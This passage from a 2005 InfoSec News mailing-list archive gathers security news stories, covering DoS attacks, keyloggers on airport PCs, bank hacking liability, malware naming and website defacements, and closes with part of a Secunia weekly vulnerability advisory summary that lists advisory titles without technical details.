London on Wednesday. The fans "mounted a fairly crude attack" in response to the American millionaire's ultimately successful takeover bid earlier this year, targeting visible representatives of the company, such as the lead partner in the firm and the head of the external PR company, Andrews said. The attack did not crash the firm's servers but instead slowed down emails being sent and received at the firm because of the volume of massive emails being queued at the portal, according to Andrews. "It was an annoyance," he said. It was fairly easy to remedy the situation as the attack was "so unsophisticated", according to Andrews. The firm "simply put in blocks at the perimeter through the service provider" in order to filter the spam, Andrews said. "Interestingly, if you try to send us emails even now with words like 'Man United' or 'Glazer' in, they'll bounce back," he added. The current Computer Misuse Act (1990) does not specifically cover DoS attacks, although the government is currently reviewing this legislation. Even though Allen & Overy were subject to such attacks, Andrews is not in favour of tougher legislation. "There will always be somewhere in the world where an attack can be launched," he said. "There are Manchester United fans in other countries after all," Andrews said. According to reports, Deutsche Bank was forced to pull out of talks with Glazer in late 2004 after being bombarded with faxes, phone calls and emails from Manchester United fans. From isn at c4i.org Thu Sep 22 01:33:17 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 22 01:46:48 2005 Subject: [ISN] Airport PCs stuffed with meaty goodness Message-ID: http://www.theregister.co.uk/2005/09/21/airport_pc_security_lax/ By John Leyden 21st September 2005 Businesspeople are treating public access terminals in airport departure lounges as their home PCs and in the process exposing confidential data and email messages to all and sundry. A mixture of curiosity and boredom led consultants from the Dubai-based network security outfit Scanit to uncover a plethora of secrets left by globe-trotting executives who log on in-between flights. Many airport executive lounges are equipped with PCs that allow business and first class fliers to surf the web. Rather than using a web-based email service and clearing the cache and password completion forms before shutting down, some execs are using Outlook Express packages on these machines to write emails. Outlook Express is probably not configured to allow emails to be sent from these machines, so any message created simply moves to the system's 'outbox' where it remains indefinitely after the user clicks 'send'. Even if the system is configured to send messages, the email will normally be saved in the machine's 'sent items' folder. In either case, email messages are left wide open for subsequent access. You'd think most people would realise this but Scanit has discovered otherwise. While traveling to meet clients, Scanit engineers found everything from intimate messages to mistresses (perfect for blackmail) to desktop-saved documents outlining multi-million dollar deals, complete with profit margins and lowest bid values. Tasty. They also found many of these airport lounge PCs were infected with computer viruses. Scanit chief exec David Michaux recalls a discovery he made while waiting for a delayed flight. "As I was playing patience, I noticed heavy network traffic on the lounge machine's taskbar even though I wasn't using any network applications," he said. "After some delving I was amazed to find Back Orifice 2000 (BO2K) as the culprit. It had been invisibly collecting my keystrokes and sending a record of them to a Hotmail account every 15 minutes." Michaux reported his findings to the lounge receptionist who said that she wasn't responsible for the security of machines. Another lapse (this time in a London airport) permitted users to log onto machines as an administrator rather than a restricted user. Again, Scanit's engineers found key-loggers running on systems at the airport. "The danger is that the CEO-types who travel on behalf of their companies and use these lounges are privy to usually sensitive data," Michaux explains. "This makes computers there a veritable goldmine, whether it's executives downloading attachments from their web mail and leaving them on the desktop, or even deleting them afterwards, but not emptying the recycle bin before they leave to catch their plane." Even executives who do take care are likely to be let down by the lounge's lack of security, especially if a hacker has turned its machines into zombie drones. The security of wireless networks if often maligned but this is one problem wider use of laptops by business execs can help to control. ? From isn at c4i.org Thu Sep 22 01:33:30 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 22 01:47:41 2005 Subject: [ISN] Lawmakers: Banks Should Be Responsible for Hacking Damages Message-ID: http://english.donga.com/srv/service.php3?bicode=020000&biid=2005092244248 SEPTEMBER 22, 2005 Starting next year, financial companies should offer compensation to customers for damages caused by electronic financial transactions, including transactions using the Internet, telephone, and automatic teller machines, even if the companies were not at fault. So far, financial companies have rejected compensation requests, saying that they are not responsible for losses of cash caused by hacking. Also, it is expected that users of prepaid cards will have an easier time changing the balance of their cards into cash. The Ministry of Finance and Economy and the Finance and Economy Committee of the National Assembly said on September 21 that a bill on e-finance transactions was recently submitted to a subcommittee responsible for deliberation of finance bills. The bill was automatically canceled due to delayed deliberation after it had been submitted to the 16th National Assembly in August 2003. Park Jong-keun, Grand National Party representative and head of the finance and economy committee, said, "There is high chance that the bill would be approved by this regular session of the National Assembly, since a public hearing was held in June this year, and there is no diverging opinion between the ruling and opposition camps." The bill stipulates that financial companies shall take responsibility for financial accidents caused by identity (ID), password and prepaid card hacking, starting next January 1, even if the companies were not at fault. Currently, financial companies and customers conform to contracts which state, "Companies shall compensate only when they made a mistake." However, it is hard for customers to receive compensation for damages when neither companies nor customers are responsible for the accidents. This June, when a hacker withdrew 50 million won by getting a customer's bank account number, ID, password and security card number using a hacking program, the bank refused to compensate, claiming that it was not responsible. It quickly shifted its stance and paid damages due to a public outcry over the incident, but the fact remains that there is no legal protection for victims. If the e-finance transaction law is approved, banks will be obliged to pay damages and interest to customers if neither bank nor customer is at fault in case of financial losses such as those due to hacking. But customers will still be responsible for their own losses if they are at fault, such as leaking their passwords or carelessly keeping their security cards used in cash transaction. Banks should secure consent from customers by making a new contract according to a Presidential decree scheduled to be written early next year. Furthermore, the bill states that banks shall pay cash when users of prepaid cards, such as gift cards that banks are currently selling, want to receive their balance in cash after spending more than 80 percent of their reserve money. Banks currently only offer the balance money option to customers when 90 percent of their reserve money is used. Chung Yun-seon, a senior researcher at the Korea Customer Protection Board, said, "The introduction of the law will enhance the rights of customers who have had a hard time verifying the faults of financial companies." From isn at c4i.org Fri Sep 23 01:42:09 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 23 01:50:15 2005 Subject: [ISN] US-CERT Malware Naming Plan Faces Obstacles Message-ID: http://www.eweek.com/article2/0,1895,1862251,00.asp By Paul F. Roberts September 22, 2005 US-CERT, the U.S. Computer Emergency Readiness Team, will begin issuing uniform names for computer viruses, worms and other malicious code next month, as part of a program called the Common Malware Enumeration initiative. The program is intended to clear up confusion that results from the current decentralized system for naming Internet threats, which often results in the same virus or worm receiving different names from different anti-virus vendors. However, anti-virus experts say the voluntary CME (Common Malware Enumeration) program will face a number of challenges, including that of responding quickly to virulent virus and worm outbreaks. CME is being run by the Mitre Corp., based in Bedford, Mass. and McLean, Va., for the U.S. DHS (Department of Homeland Security) National Cyber Security Division. Work was begun on the program about one year ago. So far, CME numbers have been assigned to a handful of critical worms and viruses, said Julie Connolly, principal information security engineer at Mitre. New malicious code samples are held for 2 hours and, if no other example of the new code is submitted, assigned a CME number. When multiple examples of new malicious code are submitted within the 2-hour window, Mitre will ask anti-virus company researchers to work out conflicts in definitions and submit one or more samples for numbering, Connolly said. US-CERT warns of attacks on systems running Veritas backup software. Read more here. Contrast that with the present system for naming malicious code, in which each company that discovers a threat assigns it a name based on that company's database of threats. Most companies make cursory attempts to synchronize their virus and worm names with those of other vendors, but there are frequent divergences and differences. For example, on Sunday, Symantec Corp. issued an alert for a Category 2 mass-mailing worm it named "W32.Lanieca.H@mm." However, Kaspersky Lab, another anti-virus company, named the same worm "Email-Worm.Win32.Tanatos.p," McAfee Inc. called the threat "W32.Eyeveg.worm" and Trend Micro Inc. called it "WORM-WURMARK.P," according to Symantec's Web site. "Naming is a problem for everybody," said Bruce Hughes, senior anti-virus researcher at Trend Micro. The CME program will help security administrators and end users of anti-virus software, as well as anti-virus companies, Hughes said. The new system could make it easier for operations staff at large companies to coordinate response to virus outbreaks, said Erik Johnson, vice president and program manager at Bank of America Corp. in Boston. Bank of America has different teams that handle viruses both at the network perimeter and on the company's internal network. In addition, the company uses a number of different anti-virus products simultaneously, he said. "For operations folks, it might make a difference," Johnson said. "I don't care what they name them as long as they kill those suckers," said Hap Cluff, director of IT for the City of Norfolk, Va. Cluff said the new naming system will make it easier to respond to questions from users about new viruses and worms. Currently, Mitre is working with major anti-virus vendors including McAfee, Symantec, Trend Micro, Sophos Plc, F-Secure Corp., Computer Associates International Inc. and Microsoft Corp. to launch the program, but the program is open to smaller anti-virus and security software vendors as well, Connolly said. Mitre has created a secure server to which participating anti-virus companies pass their discoveries, and will launch a CME Web site on Oct. 3 that will list about 21 viruses with CME numbers. Initially, only high-impact viruses and worms will receive CME numbers, though Mitre may extend CME numbers to lower-level threats once the program is up and running, she said. The CME number and links to a description of the threat will appear on a Mitre Web site akin to the CVE (Common Vulnerabilities and Exposures) Web site. Anti-virus companies will link to that definition from their own advisories, Trend Micro's Hughes said. Vincent Weafer, senior director of security response at Symantec, said the CME number may not be available in the first hours or even days after a big outbreak, but will provide a reference point for a malicious code threat in the weeks, months and years that follow. Even more importantly, the common ID number will make it easier to program tools to automatically respond to threats, he said. Still, anti-virus experts said they doubted that the new system would eliminate conflicts between vendors, or replace the habit of assigning catchy names like "Code Red" and "Slammer" to viruses. "Think about Code Red, AV," Hughes said. "Anti-virus companies had a different name for that virus, but had to eventually refer to it as Code Red because the name took off?there was a sexiness to it." From isn at c4i.org Fri Sep 23 01:42:23 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 23 01:50:27 2005 Subject: [ISN] Oracle CEO Touts Security Plans Message-ID: http://www.internetnews.com/bus-news/article.php/3550651 By David Needle September 21, 2005 SAN FRANCISCO -- With all the fervor of a sold-out rock concert, thousands of Oracle faithful packed the Moscone Center here at the Oracle Open World conference to hear CEO Larry Ellison's keynote. Earlier on Monday, Oracle co-president Charles Phillips kicked off the event with a major announcement of the database giant's plans to work with IBM on compatibility between their respective middleware offerings, Oracle's Project Fusion and IBM's WebSphere. Ellison didn't have any blockbuster announcements to make, but he kept the attendees' attention riveted, covering a wide range of topics from Oracle's recent high-profile acquisitions to business intelligence and security. And, of course, a few digs at rival Microsoft, a staple of almost any Ellison speech. With Oracle's acceptance of WebSphere, Ellison did little to quell speculation the company would also support IBM's DB2 database on its Fusion middleware. It's an important issue, given that Oracle has inherited a huge number of DB2 users via acquisitions such as PeopleSoft, Retek and Siebel. "We will make a decision after a long careful process," said Ellison. He added that Oracle is talking to PeopleSoft customers and others about whether their priorities are portability or the extra security and performance he thinks they'd get by migrating to Oracle database software. "Right now it's a coin toss [as to what Oracle will do]," said Ellison. Addressing one controversy head-on, Ellison disputed an assertion by Marc Benioff, CEO of CRM on-demand provider Salesforce.com, that Oracle would kill its recently acquired Siebel OnDemand CRM offering because it runs on rival IBM's DB2 database. He noted that Oracle also recently acquired Retek, whose software for retailers also runs on DB2, and the company has no plans to kill that. "We're very comfortable with a multiple database strategy, if that's what customers want, and we plan to support Siebel OnDemand," Ellison said. Security was a big theme of Ellison's remarks, which were followed by about an hour of Q& A with the audience. He said there is a debate within Oracle over whether the company should allow non-encrypted backups of Oracle database files. "If I lose a DVD with customer files, someone can read it and use that information," said Ellison. "No one wants that liability. I say no (to allowing non-encrypted backups)." He further warned that Internet growth, along with new technologies like VoIP, are increasing security risks. "As you move more information over the public Internet and let more employee access systems from home over the Internet and from branch offices, your security risks are increasing," Ellison noted. Among other initiatives, he said Oracle will be very focused on intrusion detection technology and strategies, as well as identity management. "Security is a number-one issue today, and it will be one, two and three tomorrow," he said. As for VOIP, Ellison warned that companies need to be careful in their implementation of the Internet phone call technology which he said allows "malicious people" to shut down or intrude on a company's voice network. He tweaked Microsoft's Bill Gates for once saying his company was going to devote special focus to security for the month of February. "Our first client was the CIA, and our second client was the National Security Agency. That was 25 years ago. We've been working on security since day one," said Ellison. He further claimed the last time an Oracle database was broken into was 15 years ago, versus the 45 minutes he said it took for someone to break into Microsoft's first version of its Passport online ordering system. Another area Ellison touched on was business intelligence software, which he said is a huge improvement over the systems many businesses use today. Ellison said BI software should, for example, let a user know how much making a certain purchase puts him or her over the capital budget. Or, when a salesperson changes a sales forecast, it should let him or her see the change in ranking against peers. A favorite BI application of his in use at Oracle reveals how well its engineers are doing by comparing whether service requests are going up faster than sales. "It's much more effective if information is coming from the market rather than from a manager," said Ellison. Asked about his next acquisition, following the multi-billion purchase of Siebel, Ellison said he has nothing planned. He reiterated a point he made over five years ago that the Internet is probably the last technology architecture, and he added that Oracle is focused on implementing service-oriented architectures (SOA). "I'm not sure what comes after SOA," said Ellison. "This visionary is very much in the present." From isn at c4i.org Fri Sep 23 01:41:21 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 23 01:50:41 2005 Subject: [ISN] Security demo hacked at confab Message-ID: http://news.com.com/2061-10789_3-5876638.html By Daniel Terdiman September 22, 2005 Demofall HUNTINGTON BEACH, Calif.--Nand Mulchandani knows from network security. His company, Redwood City, Calif.-based Determina, makes a piece of software called the "Vulnerability Protection Suite," which is designed to defend "networks from malware that exploits their most common security vulnerabilities." In other words, the package keeps the bad guys off Determina's clients' networks and makes it safe for those clients to connect their networks to the Internet. And that's a good thing. After all, said Mulchandani, Determina's vice president of marketing and business development, "The Internet is a radioactive toxic waste dump." But on Tuesday at the Demofall 2005 conference here, Determina may have wished it had a little bit of network protection of its own. As the company was onstage showing off its suite--in a demonstration that would mimic an outside attack on a network--a real-life denial-of-service attack hit and effectively knocked the demo offline. According to Mulchandani, the Determina demo was being performed across a network that had no firewall--"all the machines were hanging off the Internet"--when what appeared to be an automated attack came down the pipe and swamped the network with outside traffic. In the end, the company was able to complete its presentation, though without having been able to showcase all the features of the product. Determina wasn't the only company whose demonstration was affected by the attack Tuesday afternoon--a day organizers had already spent scurrying about trying to overcome problems caused by a massive thunderstorm early that morning--but none of the others were in the middle of unveiling a package designed to protect networks from outside attack. It may sound like fiction, but you can't make this kind of stuff up. From isn at c4i.org Fri Sep 23 01:41:35 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 23 01:50:54 2005 Subject: [ISN] RP only ASEAN nation with hacked military Web domain Message-ID: http://www.mb.com.ph/INFO2005092345065.html By melvin G. calimag Sept 23, 2005 To illustrate how hacking and cracking have become widespread in the Internet, a security firm said the Philippines is the only country in the Southeast Asian (SEA) region, and possibly in the whole world, whose military domain address (mil.ph) has been hacked several times in the last six years. A study conducted by Tipping Point, a new division of Internet equipment maker 3Com that focuses on intrusion prevention, revealed the website of the Philippine Navy hosted under the mil.ph domain has been defaced several times. From 1999 to 2005, a total of nine attacks were recorded under the country's military domain name, said 3Com senior manager for security Ken Low in a recent press briefing. As expected, commercial websites belonging to the com.ph domain name topped the list with 204 intrusions. Next came government websites connected to the gov.ph domain name with 146 attacks, followed by school websites in edu.ph with 75, then websites belonging to .ph with 71, succeeded by .org.ph with 20, and finally net.ph with 9 attacks - the same as the military. All in all, a total of 550 hacking activities were instigated against the Philippines during the period. The top hackers who launched defacement activities against Philippine websites were Darkhunter (24), Dcoder (20), Filipino Hacker (18), Hateful Soulz (16), Red Eye (14), Cyber Attack (12), Ir2dex (11), F4kelive (11), and M@trix (10). "These attacks would also show that there would always be hackers out there waiting to pounce on vulnerabilities. They don't stop," Low said, stressing that hackers are growing in numbers and apprehending one of them would not necessarily solve the problem. He said instead of engaging in the useless exercise of going after the hackers, the public should be educated on the importance of protecting their websites against possible intrusion. This was essentially the same message imparted by Commission on Information and Communications Technology (CICT) chair Virgilio Pe?a during his opening talk at the ManilaCon security confab last September 14. "Laws will never catch up with technology. So what we need is a campaign to increase the awareness level of the people on security," Pe?a said. For Tipping Point's Low, he said companies must also realize that traditional defenses like firewalls and detection systems are simply not enough to ward off vicious attacks. "Instead of intrusion detection, the way to go is intrusion prevention. This way, intrusions can be stopped even before they are launched," he said. Tipping Point also announced it has appointed TouchMedia Inc. as the local distributor for its security solutions. From isn at c4i.org Fri Sep 23 01:41:51 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 23 01:51:07 2005 Subject: [ISN] Crisis Communications Network Criticized Message-ID: http://www.washingtonpost.com/wp-dyn/content/article/2005/09/22/AR2005092202160.html By Arshad Mohammed and Yuki Noguchi Washington Post Staff Writers September 23, 2005 With Hurricane Rita bearing down on the Texas coast, Federal Communications Commission Chairman Kevin J. Martin said yesterday that the nation's emergency first responders need a mobile, wireless system that allows them to talk to one another in times of crisis anywhere in the country. The lack of such a system slowed recovery efforts after Hurricane Katrina. Police, fire and rescue personnel struggled to work together after electric power failed and the telecommunications network in Mississippi, Louisiana and Alabama was extensively damaged. Yesterday Martin called for developing more rugged first responder networks and making greater use of satellite technology that does not depend on vulnerable ground infrastructure. "When radio towers are knocked down, satellite communications may be the most effective means of communicating," Martin said at a hearing of the Senate Commerce Committee. "If we learned anything from Hurricane Katrina, it is that we cannot rely solely on terrestrial communications." Telecommunications companies yesterday positioned mobile equipment to be ready for the new storm. Bethesda-based satellite company Iridium Satellite LLC worked to get 8,000 to 10,000 of its phones delivered after Katrina hit, but this time, the company called FedEx Corp. in advance to distribute phones to areas near Rita's projected path, said Greg Ewert, an executive vice president. Ewert said that it was difficult to get as many phones to Texas because some are still being used in the New Orleans area and that he hopes many will travel with the emergency workforce into Texas. "It's definitely putting pressure on us," he said. "If it's just as bad as Katrina and it hits Houston, then we'll be strained to get the same amount of phones out there." Calls by military and emergency workers caused satellite phone traffic to spike to 3,000 percent of usual levels after Katrina, Ewert said. To get more airwave frequency to accommodate that volume, Iridium had to get approval from the FCC and other similar agencies around the world. Cingular Wireless LLC also rushed to prepare yesterday, stationing 30,000 gallons of gas, 16 temporary cell towers, more than 200 generators and about 120 technicians on standby to wait for Rita. In less than a month, Cingular has had to move such equipment from New Orleans and the Gulf Coast area where Hurricane Katrina hit, to North Carolina where Hurricane Ophelia was projected to hit, and now to Texas. The fact that such piecemeal solutions are still required four years after the Sept. 11, 2001, terrorist attacks made emergency communications a national priority has drawn criticism. "How many times do things like this need to happen before we . . . recognize that we need to make hard decisions, to give public safety the resources they need to do the job?" said Robert LeGrande, deputy chief technology officer for the District. Hurricane Katrina has revived calls in Congress to set a date for police, firedepartments and emergency medical services radio frequencies set aside for them nearly a decade ago but still used by television broadcasters. The 9/11 Commission Report, which documented in painful detail the inability of police and firefighters to communicate with one another as they tried to save people in the World Trade Center, cited freeing those frequencies as one of its key recommendations. Martin said yesterday that first responders need "smart radios" that can hop between available networks and also urged the creation of a more sophisticated national alert system to warn people of disasters, using the Internet and other newer technologies. Public safety experts said it could take years to create a truly seamless communications network for police, fire and rescue workers. Many factors are to blame, they said, including the difficulty of getting various public-safety groups to work together at the local level and the huge cost of replacing existing equipment. Most police, fire and emergency medical departments buy their own systems independently and often dislike giving up control of them. Gerald R. Faulhaber, a professor at the University of Pennsylvania and former FCC chief economist, described "the politics of control" at the local level as one of the greatest obstacles. "The police chiefs fight tooth and nail to maintain control over their radios and their channels. The fire chiefs fight tooth and nail to maintain control over their radios," he said. "Who is going to take on the police chief? Who is going to take on the fire chief?" David Aylward, the director of ComCARE, a nonprofit group that seeks to improve first-responder communications, said that while long-term issues are discussed, more could be done to make better use of existing networks. "What isn't years away is connecting agencies together and backing it up with redundant satellite and satellite links. That could be done in six months, and it's a travesty that it wasn't done and that it isn't done," he said. ? 2005 The Washington Post Company From isn at c4i.org Fri Sep 23 01:43:15 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 23 01:51:23 2005 Subject: [ISN] Secunia Weekly Summary - Issue: 2005-38 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2005-09-15 - 2005-09-22 This week : 58 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information. Every single vulnerability report is being validated and verified before a Secunia advisory is written. Secunia validates and verifies vulnerability reports in many different ways e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued. As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet. Secunia Online Vulnerability Database: http://secunia.com/ ======================================================================== 2) This Week in Brief: Peter Zelezny has discovered a vulnerability in various Mozilla based products, which can be exploited by malicious people to compromise a user's system. This vulnerability can only be exploited on Unix / Linux based environments. Additional details about solutions and possible attack vectors can be found in the referenced Secunia advisories below. References: http://secunia.com/SA16869 http://secunia.com/SA16846 -- Secunia Research has discovered two vulnerabilities in the Opera Mail client, which can be exploited by a malicious person to conduct script insertion attacks and to spoof the name of attached files. The vendor has released an updated version, which fixes these vulnerabilities. Reference: http://secunia.com/SA16645 -- Two vulnerabilities have been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system. Additional details can be found in the referenced Secunia advisory below. Reference: http://secunia.com/SA16848 VIRUS ALERTS: Secunia has not issued any virus alerts during the week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA16869] Firefox Command Line URL Shell Command Injection 2. [SA16764] Firefox IDN URL Domain Name Buffer Overflow 3. [SA16806] Linksys WRT54G Multiple Vulnerabilities 4. [SA16645] Opera Mail Client Attachment Spoofing and Script Insertion 5. [SA11762] Opera Browser Favicon Displaying Address Bar Spoofing Vulnerability 6. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability 7. [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability 8. [SA16830] IBM Lotus Domino "BaseTarget" and "Src" Cross-Site Scripting 9. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities 10. [SA16560] Windows Registry Editor Utility String Concealment Weakness ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA16877] BNBT / CBTT / XBNBT Denial of Service Vulnerability [SA16871] VERITAS Storage Exec / StorageCentral DCOM Server Buffer Overflow [SA16854] TAC Vista "Template" Disclosure of Sensitive Information Vulnerability [SA16838] Compuware DriverStudio Two Vulnerabilities [SA16870] Digger Solutions Intranet Open Source "project_id" SQL Injection [SA16865] Multi-Computer Control System (MCCS) Denial of Service Vulnerability UNIX/Linux: [SA16869] Firefox Command Line URL Shell Command Injection [SA16846] Mozilla Command Line URL Shell Command Injection [SA16895] Alkalay contribute "template" Shell Command Injection Vulnerability [SA16894] HP OpenVMS Secure Web Browser Multiple Vulnerabilities [SA16887] Alkalay man-cgi "topic" Shell Command Injection Vulnerability [SA16886] Alkalay notify "from" Shell Command Injection Vulnerability [SA16884] Mandriva update for clamav [SA16880] Alkalay nslookup Shell Command Injection Vulnerabilities [SA16879] HP Tru64 UNIX libXpm Multiple Vulnerabilities [SA16862] Gentoo update for clamav [SA16848] ClamAV UPX and FSG Handling Vulnerabilities [SA16844] Gentoo update for mozilla/mozilla-firefox [SA16834] SUSE update for evolution [SA16892] Gentoo update for zebedee [SA16872] Unixware update for Libtiff [SA16864] Gentoo update for apache/mod_ssl [SA16858] Webmin / Usermin PAM Authentication Bypass Vulnerability [SA16856] Gentoo update for mailutils [SA16849] SUSE update for squid [SA16876] Tofu Game Engine Arbitrary Python Code Execution Vulnerability [SA16863] Gentoo workaround for py2play [SA16855] Py2Play Game Engine Arbitrary Python Code Execution Vulnerability [SA16888] PerlDiver "module" Cross-Site Scripting Vulnerability [SA16893] HP Tru64 UNIX FTP Daemon Denial of Service Vulnerability [SA16885] Mandriva update for cups [SA16883] MasqMail Two Privilege Escalation Vulnerabilities [SA16874] Sun Solaris "tl" Driver Denial of Service Vulnerability [SA16866] Bacula Multiple Insecure Temporary File Creation Vulnerability [SA16861] Trustix update for multiple packages [SA16860] Fedora update for xorg-x11 [SA16850] Debian update for kdebase [SA16845] Sun Solaris X11 Pixmap Creation Integer Overflow Vulnerability [SA16842] Debian update for lm-sensors [SA16835] SimpleCDR-X Insecure Temporary Image File Creation [SA16875] Safari "data:" URI Handler Denial of Service Weakness [SA16891] Gentoo update for util-linux [SA16882] Mandriva update for util-linux [SA16857] Ubuntu update for util-linux Other: [SA16840] vxTftpSrv Long Filename Buffer Overflow [SA16837] vxFtpSrv "USER" Command Buffer Overflow Vulnerability [SA16836] Avocent CCM Port Access Control Bypass Vulnerability [SA16839] vxWeb Denial of Service Vulnerability Cross Platform: [SA16841] Digital Scribe "username" SQL Injection [SA16896] Zengaia Unspecified SQL Injection Vulnerability [SA16881] Simplog SQL Injection Vulnerabilities [SA16878] Land Down Under "Referer" SQL Injection Vulnerability [SA16867] PHP Advanced Transfer Manager Multiple Vulnerabilities [SA16859] Helpdesk software Hesk Authentication Bypass Vulnerability [SA16853] NooToplist "o" SQL Injection Vulnerability [SA16843] PHP-Nuke Unspecified wysiwyg Editor Vulnerabilities [SA16873] vBulletin Multiple Vulnerabilities [SA16868] phpBB Remote Avatar Information Disclosure Weakness ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA16877] BNBT / CBTT / XBNBT Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-20 A vulnerability has been reported in BNBT / CBTT / XBNBT, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16877/ -- [SA16871] VERITAS Storage Exec / StorageCentral DCOM Server Buffer Overflow Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-20 A vulnerability has been reported in Storage Exec / StorageCentral, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16871/ -- [SA16854] TAC Vista "Template" Disclosure of Sensitive Information Vulnerability Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information Released: 2005-09-19 Dennis Rand has reported a vulnerability in TAC Vista, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/16854/ -- [SA16838] Compuware DriverStudio Two Vulnerabilities Critical: Moderately critical Where: From local network Impact: Security Bypass, System access Released: 2005-09-16 cocoruder has reported two vulnerabilities in DriverStudio, which can be exploited by malicious people to bypass certain security restrictions, and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16838/ -- [SA16870] Digger Solutions Intranet Open Source "project_id" SQL Injection Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2005-09-21 Kutbuddin Trunkwala has reported a vulnerability in Digger Solutions Intranet Open Source, which can be exploited by malicious users to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16870/ -- [SA16865] Multi-Computer Control System (MCCS) Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2005-09-19 basher13 has discovered a vulnerability in MCCS, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16865/ UNIX/Linux:-- [SA16869] Firefox Command Line URL Shell Command Injection Critical: Extremely critical Where: From remote Impact: System access Released: 2005-09-20 Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16869/ -- [SA16846] Mozilla Command Line URL Shell Command Injection Critical: Extremely critical Where: From remote Impact: System access Released: 2005-09-21 A vulnerability has been discovered in Mozilla Suite, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16846/ -- [SA16895] Alkalay contribute "template" Shell Command Injection Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-21 sullo has discovered a vulnerability in Alkalay contribute, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16895/ -- [SA16894] HP OpenVMS Secure Web Browser Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Cross Site Scripting, Spoofing, System access Released: 2005-09-21 HP has acknowledged some vulnerabilities in OpenVMS running Secure Web Browser, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, spoof the contents of web sites, spoof dialog boxes, or compromise a user's system. Full Advisory: http://secunia.com/advisories/16894/ -- [SA16887] Alkalay man-cgi "topic" Shell Command Injection Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-21 sullo has discovered a vulnerability in Alkalay man-cgi, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16887/ -- [SA16886] Alkalay notify "from" Shell Command Injection Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-21 sullo has discovered a vulnerability in Alkalay notify, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16886/ -- [SA16884] Mandriva update for clamav Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-21 Mandriva has issued an update for clamav. This fixes two vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16884/ -- [SA16880] Alkalay nslookup Shell Command Injection Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-21 sullo has discovered some vulnerabilities in Alkalay nslookup, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16880/ -- [SA16879] HP Tru64 UNIX libXpm Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-21 HP has acknowledged some vulnerabilities in HP Tru64 UNIX, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16879/ -- [SA16862] Gentoo update for clamav Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-19 Gentoo has issued an update for clamav. This fixes two vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16862/ -- [SA16848] ClamAV UPX and FSG Handling Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-19 Two vulnerabilities have been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16848/ -- [SA16844] Gentoo update for mozilla/mozilla-firefox Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-19 Gentoo has issued an update for mozilla/mozilla-firefox. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16844/ -- [SA16834] SUSE update for evolution Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-16 SUSE has issued an update for evolution. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16834/ -- [SA16892] Gentoo update for zebedee Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-21 Gentoo has issued an update for 